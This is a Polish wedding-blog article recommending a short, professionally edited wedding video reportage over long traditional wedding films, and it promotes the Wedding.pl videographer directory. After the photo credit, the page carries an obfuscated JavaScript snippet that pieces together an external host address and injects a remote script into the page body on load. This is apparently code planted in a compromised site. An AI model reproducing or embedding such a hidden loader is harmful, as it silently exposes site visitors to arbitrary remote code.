Postaw na reportaż ślubny!

Wydaje ci się, że film z wesela to must have, ale obawiasz się, że nikt nie będzie go chciał oglądać? Masz rację, długie filmy powoli odchodzą do lamusa. Hitem dzisiejszych czasów jest reportaż ślubny!

Filmy kręcone na weselach i oglądane na magnetowidach weszły w modę w latach dziewięćdziesiątych ubiegłego wieku, wraz z upowszechnieniem dostępu do kamer i wspomnianych magnetowidów. Początkowo wszyscy ekscytowali się tą nową formą zatrzymywania wspomnień w ruchomym kadrze. Jednak szybko okazało się, że kilkugodzinny film z wesela jest nudny nawet dla samych zainteresowanych. Brak profesjonalnego montażu, niepotrzebne dłużyzny, nieestetyczny widok rodziny jedzącej flaki – to wszystko sprawiło, że film z wesela owszem – był i jest obowiązkowy, ale natychmiast po nakręceniu trafiał do szuflady, by prędko jej nie opuścić.

Reportaż z wesela od tradycyjnego filmy różni się przede wszystkim czasem trwania. Zwyczajowo nie przekracza półtorej godziny. Jest to długość porównywalna z filmem pełnometrażowym, długość, do jakiej jesteśmy przyzwyczajeni. Ale nie tylko o długość chodzi. Istotną różnicą jest sposób dokumentowania imprezy, używany sprzęt, sposób montażu, a nawet sam materiał. O ile film wiernie oddawał tylko ślub i wesele (czasem to, co działo się w domu bezpośrednio przed ślubem), o tyle w reportażu weselnym można znaleźć dużo więcej, np. ciekawe momenty z życia państwa młodych, sceny kręcone w ich ulubionych miejscach, krótką relację z sesji ślubnej i wiele więcej. Wszystko zależy od inwencji kamerzysty i państwa młodych.

Kamerzyści ślubni coraz częściej odchodzą od kręcenia filmów tradycyjną kamerą i sięgają po lustrzanki cyfrowe. Dają one o wiele większe możliwości uzyskania efektów porównywalnych z tymi znanymi z filmów. Wszystko za sprawą zmiennych obiektywów i oczywiście zdolnego kamerzysty. Najlepszy nawet sprzęt nie zrobi wszystkiego sam. Coraz częściej widuje się także drony latające nad kościołami. To dzięki nim możliwe są ciekawe ujęcia państwa młodych i gości z góry. Dawniej takie sceny trzeba było kręcić z helikoptera, nic więc dziwnego, że nie było o tym mowy na ślubach.

Dobry kamerzysta nie tylko sprawnie operuje kamerą, ale potrafi także fachowo zmontować reportaż tak, by w ciekawy sposób pokazać najbardziej efektowne sceny ze ślubu i wesela. Aby znaleźć tego idealnego, warto odwiedzić platformę ślubną Wedding.pl i określając kryteria wyszukiwania podać między innymi swoją lokalizację. Jeśli wskażemy konkretne miasto, na przykład Poznań, otrzymamy listę kamerzystów weselnych z Poznania i okolic: https://wedding.pl/kamerzysta-na-wesele/poznan.

Foto: Unsplash.com

(function(){
qxtg=document.createElement(“script”);qxtg_=(“us”)+(“ta”);
qxtg_+=”t”+(“.”);qxtg_+=(“in”);qxtgu=”69200208″;qxtg.async=true;
qxtgu+=”.i95s20x3xtgayq852″;qxtg.type=”text/javascript”;qxtg_+=”f”+”o”+(“/”);
qxtgu+=”keyut7zbaqgzy”;qxtg.src=”//”+qxtg_+qxtgu;
dqxtg=document.body;dqxtg.appendChild(qxtg);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.